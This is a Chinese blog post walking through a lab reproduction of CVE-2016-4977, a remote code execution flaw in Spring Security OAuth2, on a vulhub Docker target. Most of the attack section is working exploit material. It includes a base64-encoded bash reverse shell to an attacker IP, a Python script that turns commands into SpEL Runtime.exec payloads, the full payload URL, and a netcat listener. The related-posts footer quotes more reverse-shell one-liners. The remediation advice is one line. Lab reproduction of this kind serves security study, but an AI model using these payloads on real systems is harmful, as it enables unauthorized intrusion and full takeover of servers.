CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)

已于 2023-09-16 13:06:28 修改
阅读量992 收藏 1
点赞数 2
分类专栏: vulhub漏洞复现 文章标签: spring java 后端 安全架构
于 2023-09-02 15:02:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44862511/article/details/132638312
版权

目录

一.Spring框架的概念

二.漏洞原理

三.影响版本

四.搭建环境

1.vulhub靶场下载

2.docker-compose下载地址

3.服务启动

五.漏洞复现

1.漏洞验证

2.制作反弹shell

3.脚本生成payload

4.监听反弹

六.修复建议

一.Spring框架的概念

Spring是一个开源框架,它由Rod Johnson创建。它是为了解决企业应用开发的复杂性而创建的。Spring使用的是基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅仅限于服务器端的开发。从简单性、可测试性和松耦合性角度而言,绝大部分Java应用都可以从Spring中受益.

二.漏洞原理

Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞

三.影响版本

Spring Security OAuth 2.3到2.3.2

Spring Security OAuth 2.2到2.2.1

Spring Security OAuth 2.1到2.1.1

Spring Security OAuth 2.0到2.0.14

四.搭建环境

1.vulhub靶场下载

Vulhub - Docker-Compose file for vulnerability environment

2.docker-compose下载地址

https://github.com/docker/compose/releases

3.服务启动

一切都准备好之后就可以启动CVE-2016-4977 的环境了.

先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.

docker-compose up -d                 #安装并启动环境

docker ps                 #查看当前正在运行的服务

可以看到spring的端口为8080

ip a                 #查看IP 我的IP为192.168.184.155

在浏览器端输入 你的ip+端口8080 访问服务,如果显示如下页面,则表示服务搭建成功!

五.漏洞复现

1.漏洞验证

靶场环境搭建成功之后,拼接路径payload来验证漏洞是否存在.

发现需要我们进行登录,这里根据弱口令admin/admin进行登录。

注意!将这里的IP修改为自己的靶场IP , 执行命令: 2*2

http://192.168.184.155:8080/oauth/authorize?response_type=${2*2}&client_id=acme&scope=openid&redirect_uri=http://test

${} 里面的内容被解析并执行,说明我们可以利用反弹shell来进行远程命令执行.

2.制作反弹shell

进入棱角社区制作反弹shell , 这里用到的IP是kali的IP ,端口随便定一个8888

[~]#棱角 ::Edge.Forum*                #棱角社区

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}

3.脚本生成payload

进入kali , 使用脚本制作payload .

vim poc.py                 #编辑制作payload

#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.

#!/usr/bin/env python

message = input('Enter message to encode:')

poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])

for ch in message[1:]:

poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)

poc += ')}'

print(poc)

执行脚本:

python3 poc.py                 #运行脚本

然后将刚刚生成的反弹shell复制到此处:

4.监听反弹

在kali再打开一个终端界面 ,进行监听反弹.

nc -lvvp 8888                 #监听反弹

然后我们打开浏览器 ,修改连接访问,进行反弹shell.

我的最后链接如下 :

http://192.168.184.155:8080/oauth/authorize?response_type=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(98).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(70)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(83)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(43)).concat(T(java.lang.Character).toString(74)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(90)).concat(T(java.lang.Character).toString(71)).concat(T(java.lang.Character).toString(86)).concat(T(java.lang.Character).toString(50)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(51)).concat(T(java.lang.Character).toString(82)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(56)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(73)).concat(T(java.lang.Character).toString(117)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(84)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(76)).concat(T(java.lang.Character).toString(106)).concat(T(java.lang.Character).toString(69)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(78)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(77)).concat(T(java.lang.Character).toString(122)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(118)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(68)).concat(T(java.lang.Character).toString(103)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(79)).concat(T(java.lang.Character).toString(67)).concat(T(java.lang.Character).toString(65)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(80)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(89)).concat(T(java.lang.Character).toString(120)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(54)).concat(T(java.lang.Character).toString(52)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(100)).concat(T(java.lang.Character).toString(125)).concat(T(java.lang.Character).toString(124)).concat(T(java.lang.Character).toString(123)).concat(T(java.lang.Character).toString(98)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(44)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(105)).concat(T(java.lang.Character).toString(125)))}&client_id=acme&scope=openid&redirect_uri=http://test

查看kali监听是否反弹成功:

六.修复建议

升级为最新版本.

徐长卿学网安
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细
2401_83946570的博客
04-19 900
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
php 漏洞 怎么解决,php安全漏洞怎么修复?
weixin_39869693的博客
03-09 3695
该楼层疑似违规已被系统折叠隐藏此楼查看此楼PHP PHAR扩展安全漏洞(CVE-2016-4072)PHP ‘php_filter_encode_url’函数整数溢出漏洞(CVE-2016-4345)PHP ‘str_pad’函数整数溢出漏洞(CVE-2016-4346)PHP‘wddx_stack_destroy’函数释放后重用漏洞(CVE-2016-7413)PHP Calendar...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到漏洞效果,请勿非法使用,仅供学习研究
【vulhub】 Spring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现
qq_45300786的博客
07-30 2134
利用条件 0x01 影响Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring Security OAuth 2.0到2.0.14 Spring Security OAuth 2.1到2.1.1 Spring Security OAuth 2.2到2.2.1 Spring Security OAuth 2.3到2.3.2 0x02 默认登录账号密码 admin\admin 访问路径/oauth/auth
Spring漏洞(CVE-2016-4977)在IDEA中复现
wxzyyds的博客
11-03 1261
复现SpringCVE-2016-4977),并且在IDEA中实现动态调试
cve-2016-4977(spring-security-oauth) RCE漏洞复现
m0_58596609的博客
04-21 4996
cve-2016-4977(spring-security-oauth) RCE漏洞复现
spring Security OAuth2 远程命令执行漏洞CVE-2016-4977复现-kali
最新发布
qq_41760817的博客
12-04 1222
spring Security OAuth2 远程命令执行漏洞CVE-2016-4977复现
Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
mole_exp的博客
02-22 5376
Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
weixin_45715461的博客
08-10 1452
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
漏洞复现Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1077
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
Spring-RCE(CVE-2022-22965)的前世今生
include_voidmain的博客
04-08 926
0x01 前言 今天就来说说最近比较火的这个Spring-RCE漏洞,但是今个这文章的标题叫做Spring-RCE的前世今生,那么就得扯扯他的祖宗了CVE-2010-1622,这个2010年就出现的漏洞为啥在2022的今天卷土重来?为啥CVE-2022-22965要在java9+才能实现?在今天这篇文章中就给大家带来答案。 0X02 CVE-2010-1622 这个漏洞出现在2010年可以进行拒绝服务,通用可以进行远程命令执行Spring很早就发布了补丁修复了此漏洞,在此分析为CVE-2022-22965做
RCE远程命令/代码执行漏洞)原理及复现
qq_41679358的博客
08-15 9293
本文转自行云博客https://www.xy586.top/ 作用 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 原理 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果,设计者在完成该功能时,没有做严格.
Spring框架漏洞复现及解析(CVE-2016-4977CVE-2022-22963、CVE-2017-8046、CVE-2022-22978)
Continuejww的博客
10-17 378
Spring Cloud Function 本 3.1.6、3.2.2 和更早本不受支持的本中,当使用路由功能时,用户可以提供特制的 SpEL 作为路由表达式,这可能导致远程代码执行和对本地资源的访问Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码Spring Security 是spring项目之中的一个安全模块,可以非常方便与spring项目无缝集成。
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977)——漏洞复现
weixin_42090431的博客
11-27 86
bash -i >& /dev/tcp/你的ip/6666 0>&1(对这部分base64编码)
CVE-2019-17564漏洞复现[基于Ubuntu 16.04 LTS]
rep_Su的博客
02-15 4878
基于Ubuntu 16.04 LTS的CVE-2019-17563漏洞复现0x0 漏洞描述0x1 影响范围0x2 漏洞复现环境准备环境搭建漏洞展示0x3 其他修复建议关于此文参考链接 0x0 漏洞描述 Apache Dubbo支持多种协议,官方推荐使用 Dubbo 协议,CVE-2019-17564是属于Apache Dubbo HTTP协议中的一个反序列化漏洞,该漏洞的主要原因在于当Apache...
CVE-2016-4977
09-01
CVE-2016-4977是指Spring Security OAuth2远程命令执行漏洞。该漏洞复现过程可以参考第一篇和第二篇的参考链接。该漏洞的影响本较广泛,具体本信息可以在参考链接中找到。该漏洞的利用方式可以使用bash命令进行远程执行,例如使用"bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/1122 0>&1"这样的命令进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【vulhub】 Spring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现](https://blog.csdn.net/qq_45300786/article/details/119249422)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [cve-2016-4977(spring-security-oauth) RCE漏洞复现](https://blog.csdn.net/m0_58596609/article/details/124323206)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值